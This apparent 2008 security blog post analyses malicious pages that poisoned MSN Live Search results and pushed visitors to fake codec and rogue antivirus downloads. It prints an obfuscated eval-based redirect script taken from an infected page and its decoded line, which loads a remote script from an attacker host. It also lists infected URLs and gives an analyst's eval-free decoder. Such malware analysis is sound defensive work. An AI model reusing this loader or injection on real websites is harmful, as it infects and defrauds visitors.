22 Jul 08

Malware disguised among MSN search results…

Hi there, this is my first post on the blog, and I’ll be blogging about malware pages disguised as good results on the MSN Live Search engine. Over the past weeks I have detected close to one thousand infected servers, each one of them hosting over 2000 bad HTML pages, currently being returned to users via MSN.

This is the way the infection happens: a user performs a search on MSN Live Search and, depending on his luck, some malicious web sites are returned. The brief description displayed on the search results page may indicate that the contents of the website could be a good match for what the user is looking for, but he will never see the page once the link is clicked…

On those malicious pages there is some more or less random text (the text can be somewhat targeted at certain keywords, or just stolen from real websites). But at the top of the page, an encrypted script automatically redirects the user through a server in Russia that, on the first visit, will ask the user to install a video codec to view a video of what he was looking for.

I have identified over 1000 web sites, each with close to 3000 HTML pages. The variables in the script and the “keys” to decrypt it vary between sites, making detection harder. If you visit one of those sites directly (no referer), the site will respond with an apparent 404 – Not Found message… but looking at the source code of the page you can easily see the full real page and script. This is a trick to make detection even harder, as it’s very easy to think that the page is actually down.

Do you want to see some of them?

Open MSN.COM and do a search for acelge.html. Now, this is not how a normal user will get to the bad site, the user would have been searching for, say, “Movies in Anchorage, AK”. Be careful, don’t click on the links unless you like to be infected!

MSN returns the results as below:

Movies In Anchorage Ak, Area Movie Theaters | Local Showtimes and …
in Anchorage, AK, Result 1 – 9 of 9. Blockbuster Movies · Map, 1.30 miles. (907) 277-8525. Anchorage, AK 99501. Movie Theaters in Anchorage, AK Get Ratings & Reviews on Movie …

hxxp://www.zirdum.net/photos/Sanja/pics/acelge.html · Cached page
Unborn Babies are exposed in the womb to synthetic chemicals.
23 April 2003. Unborn baby International. Unborn babies are exposed in the womb to synthetic. Scanning Healthcare is vital for Image for wassily results doctors to help track the …

neurosurgeon.com/database/questions/995385288/cache/acelge.html · Cached page
Room Tour clean
you do live with the duke dirt?? then you of need the queen of

audioeducator.com/uploads/downloadsfiles/images/acelge.html · Cached page
Murray Feiss MF WB1220 Wall Washer Sconce Wrought Iron from the

By looking for the page name we immediately get several relevant results. A normal user would have those results mixed among the real ones. Just by looking at the link we can determine that they all have something in common: all the bad pages are located deep in the web server, usually inside an images, pics, thumbs or cached folder. We can also notice that the URLs themselves don’t seem to be related to the information searched for…

If we were to click on the link, our browser would never get to see the page. A script similar to this one would take over:

var q = "movies in anchorage ak";
function B(nW,g){if(!g){g='q<Gzd`@=j?EUTWrLb5i6(+Pw_pky3)vKFn7sRV$D{ZB[JSe.Hl^Y*!:fOIN;u8mo';}var k;var EA='';for(var r=0;r<nW.length;r+=4){k=(g.indexOf(nW.charAt(r))&255)<<18|(g.indexOf(nW.charAt(r+1))&255)<<12|(g.indexOf(nW.charAt(r+2))&255)<<(6)|g.indexOf(nW.charAt(r+3))&255;EA+=String.fromCharCode((k&16711680)>>16,(k&65280)>>8,k&255);}eval(EA);}B('p@8s)P!VyDbe)f?Z)@({?YlY_^3[?f?Z3=bF3f?sLi?{)=5Hr7u._:Te3:+n3$W{UD?V3f+J)=Te)=?!3fbe)$VV)^I{)@!JU$VeU$Ve)=?!3fbe_:T._:8!yDbekDTo3z!Y):{HT6_$36*DEfd[?^p^Li3[pwWs_w<VE@5._f+SpPI*UD?Vp$+^3$+^EiJDjsOuUfWs?^JD3$VH)zODE6JF');

And when decoded, this is what it actually does:

document.write('<sc'+'ript src="hxxp://cc.search.results.trust.view.html.in.intrust.cc/count.js?p=swj016&q='+q+'&r='+escape(document.referrer)+'"></sc'+'ript>');
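As an added example (not code from the page or from the malware author), here is an eval-free re-implementation of the B() decoder above, so an analyst can recover the injected script text and pull the remote script host out of it without ever running the payload. The alphabet is the one shown on the page; the encoder, the function names and the sample input handling are my own additions, and the decoded document.write() line from the page serves as the sample.

```javascript
// Added example, not the malware author's code: an eval-free re-implementation of the page's
// B() decoder so an analyst can recover the injected script text for inspection, plus a
// helper that pulls the remote script URL out of the decoded text. The alphabet is the one
// on the page; other infected sites use different "keys", so pass theirs as the second argument.
const PAGE_ALPHABET = 'q<Gzd`@=j?EUTWrLb5i6(+Pw_pky3)vKFn7sRV$D{ZB[JSe.Hl^Y*!:fOIN;u8mo';

// Same transform as B(): 4 alphabet characters -> 24 bits -> 3 bytes. Returns the text instead
// of eval()ing it, and strips the NUL padding bytes that B() leaves behind on short tails.
function decodePayload(payload, alphabet = PAGE_ALPHABET) {
  let out = '';
  for (let r = 0; r < payload.length; r += 4) {
    const k = (alphabet.indexOf(payload.charAt(r)) & 255) << 18
            | (alphabet.indexOf(payload.charAt(r + 1)) & 255) << 12
            | (alphabet.indexOf(payload.charAt(r + 2)) & 255) << 6
            | (alphabet.indexOf(payload.charAt(r + 3)) & 255);
    out += String.fromCharCode((k & 0xff0000) >> 16, (k & 0xff00) >> 8, k & 0xff);
  }
  return out.replace(/\0+$/, '');
}

// Inverse transform (byte-oriented, ASCII input), written here to build test payloads and to
// confirm the decoder is exact; the attackers' own encoder is not on the page.
function encodePayload(text, alphabet = PAGE_ALPHABET) {
  let out = '';
  for (let i = 0; i < text.length; i += 3) {
    const b = (n) => (n < text.length ? text.charCodeAt(n) : 0) & 255;
    const k = b(i) << 16 | b(i + 1) << 8 | b(i + 2);
    out += alphabet[k >> 18 & 63] + alphabet[k >> 12 & 63] + alphabet[k >> 6 & 63] + alphabet[k & 63];
  }
  return out;
}

// From decoded text like the document.write() line above, recover the injected script's host
// and query parameters (the concatenated q and referrer parts are not part of the literal).
function extractInjectedScript(decoded) {
  const m = /src=["']([^"']+)["']/.exec(decoded);
  if (!m) return null;
  const url = new URL(m[1].replace(/^hxxp/, 'http')); // undo the defanging used on this page
  return { host: url.hostname, path: url.pathname, params: Object.fromEntries(url.searchParams) };
}

// The decoded line from the page, kept defanged (hxxp) and used as the sample input.
const SAMPLE_DECODED = "document.write('<sc'+'ript src=\"hxxp://cc.search.results.trust.view.html.in.intrust.cc/count.js?p=swj016&q='+q+'&r='+escape(document.referrer)+'\"></sc'+'ript>');";

// Encode the sample with the page's alphabet, decode it without eval, and report the target.
const roundTrip = decodePayload(encodePayload(SAMPLE_DECODED));
console.log(roundTrip === SAMPLE_DECODED, extractInjectedScript(roundTrip));
```

Swapping in a site's own alphabet and payload string gives the injected script text for that site, which is what a detection signature should be written against rather than the ever-changing encoded blob.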

There you can see the first destination on your journey to malware land. A script on the other side will decide what to do with you: is this your first visit? Then you need to view our video, so install the needed video codec. Have you been here before? Then buy our super-duper antivirus, because by now you should already be infected… What? You are still coming back? Hmm… not sure why, let’s give you some fake search results. The results may land you on the real eBay, Google or other web sites, but on the way there they will divert your browser to China or Russia to have it checked, then land you on the real web site without you ever noticing.

The truth is that the script on the other side can be updated any time they want, depending on their current campaign. Their rogue search results will keep sending a fresh wave of users every day, while the malicious content can be updated dynamically as needed. Oh, and if you go there directly you won’t see anything. Even if you open one of the pages directly you will still not see anything unless you actually display the source.

On my last test, I got prompted to install the “Microsoft Data Access – Remote Data Services…” from “Microsoft Corporation”. It was probably the real thing, but I bet ya it was not the latest version (probably one with a hole big enough to drive a truck of vodka through). I was also offered to run PCPrivacyCleaner and to watch free spy cams, all that while my computer was scanned for vulnerabilities…

User education and keeping your computer up to date is the best protection against all kinds of exploits. And not only Windows updates: any software on the computer that can be updated should be updated. RealPlayer, Macromedia Flash, Adobe… they are all susceptible to exploits and should be kept up to date. The bad guys are actively looking for the unpatched versions, and they will find yours. Always double-check where a link is going to take you before you click.


2 Responses to “Malware disguised among MSN search results…”


  1. Tam, Jul 23rd, 2008 at 3:37 pm

    Interesting.

  2. Fake Trojan Horses Messages, Oct 27th, 2008 at 10:29 am

    Great, great article. One should indeed always get the latest security patches and always be on the lookout for fake system messages. Malware artists are getting smarter all the time, and oftentimes people get deceived by fake messages, like the famous “Some dangerous trojan horses detected in your system”. The user is then presented with a dialog box that is supposed to clean the infection, but in reality by clicking OK the user will allow the infection to do its work.
